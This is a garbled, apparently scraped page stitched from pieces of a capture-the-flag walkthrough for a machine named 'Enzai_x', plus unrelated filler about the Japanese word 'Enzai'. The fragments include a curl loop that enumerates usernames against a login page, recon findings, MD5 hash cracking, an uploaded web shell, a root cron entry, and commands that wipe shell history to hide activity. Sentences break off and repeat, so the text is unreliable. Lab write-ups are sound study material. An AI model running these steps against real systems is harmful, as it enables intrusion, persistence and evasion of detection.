Enzai__x — __top__

for user in admin root test guest; do curl -s -X POST -d "username=$user&password=foo" http://10.10.10.23/login.php | grep -i "invalid password" done

| Technique | Why it matters | |-----------|----------------| | | Default NSE scripts often expose hidden services (e.g., http‑title , smb‑vuln* ). | | Error‑based vs Union‑based SQLi | Different filters

/admin (200) /uploads (403) → directory listing disabled, but “upload.php” exists /debug (200) → shows a PHP info page (phpinfo()) enzai__x

The use of "Enzai" in a username may be a reference to the Japanese legal term or a stylistic choice common in internet subcultures that adopt Japanese vocabulary. In some contexts, "Enzai" is also the title of a well-known media work involving themes of being falsely accused, which sometimes influences how the term is searched or discussed online. Content Variation

HTBEnzai_X_Exploited!

On our attacker machine:

The passwords are **MD5 hashes**. Cracking them with `hashcat` (or an online DB) yields: for user in admin root test guest; do

| Action | Command | |--------|---------| | Remove uploaded shell | rm /var/www/html/uploads/shell.php | | Delete cron entry (if you made one) | rm /etc/cron.d/enzai_root | | Close netcat sessions | exit | | Clear command history (if you logged in via SSH) | history -c && rm -f ~/.bash_history |

If you want a persistent root shell instead of just dumping the flag: Content Variation HTBEnzai_X_Exploited

http://10.10.10.23/uploads/shell.php now contains the payload.